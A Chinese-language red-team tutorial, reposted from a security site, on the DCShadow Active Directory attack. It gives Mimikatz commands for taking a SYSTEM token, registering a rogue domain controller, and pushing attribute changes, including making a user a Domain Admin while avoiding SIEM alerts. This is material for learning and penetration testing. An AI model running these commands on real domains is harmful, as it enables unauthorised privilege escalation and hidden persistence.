DCShadow是一种通过域控制器使用的合法API来修改活动目录中的现有数据的新型攻击技术。
当攻击者“拿下”域管理员权限之后,可以将这种技术应用于工作站,以绕过大多数SIEM解决方案,实现对该域的长久控制。
DCShadow是由Benjamin Delpy和Vincent Le Toux开发的,并且它最初是作为Mitre攻击框架的一部分而引入的。有关该攻击技术的详细信息,请访问DCShadow的主页。
mimidrv.sys文件是Mimikatz的组成部分,在攻击过程中,需要将其传输到扮演DC角色的工作站上面。
之后,执行“!+”命令就可以注册并启动一个具有SYSTEM级别权限的服务了。
此外,借助“!processtoken”命令可以拿到从该服务到当前的Mimikatz会话的SYSTEM令牌,只要拿到了这个令牌,就具备了实现伪域控制器所需权限。
!+
!processtoken
Mimikatz——注册服务并取得SYSTEM令牌
为了启动Mimikatz的新实例,需要具备域管理员权限,该权限将用于对合法域控制器进行身份验证,并将流氓DA的更改推送至合法域。我们可以利用以下命令来验证进程令牌。
token::whoami
Mimikatz——用户令牌
从以SYSTEM权限运行的Mimikatz实例中执行以下命令,就可以启动域控制器的minimalistic版本了。
lsadump::dcshadow /object:test /attribute:url /value:pentestlab.blog
Mimikatz——DCShadow & URL属性
以下命令会将来自流氓域控制器的更改复制到合法的域控制器。
lsadump::dcshadow /push
DCShadow——复制域控制器的属性
检查“test”用户的属性的时候,如果url属性包含指示DCShadow的新值的话,说明攻击成功了。
Mimikatz——URL属性
此外,攻击者也可以修改属性primaryGroupID的值来实现特权升级。其中,值512是域管理员组的安全标识符(SID)。
lsadump::dcshadow /object:test /attribute:primaryGroupID /value:512
w——为域管理员组添加用户
这时,用户“test”将成为域管理员组的成员。 这一点可以通过检索域管理员列表来进行验证。 下图显示了DCShadow攻击前后的域管理员变化情况。
net group "domain admins" /domain
DCShadow——验证test用户是否为DA
利用DCShadow攻击,可以为红队队员实现域控制的持久性提供各种便利,例如修改SID历史记录、krbtgt帐户的密码或将用户添加到高级组(例如域和企业管理员),等等。尽管这种攻击需要提升权限(DA),但Nikhil Mittal发现,可以从具有必要权限的域用户的角度来执行DCShadow攻击,这样就可以避免使用DA权限了。这个脚本是Nishang框架的一部分,可以从这里下载。使用合法的API来传递数据并将其推送到活动目录是一种非常隐藏方法,利用这种方法可以修改活动目录而不用担心会触发SIEM上的警报。
本文作者:mssp299
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/70892.html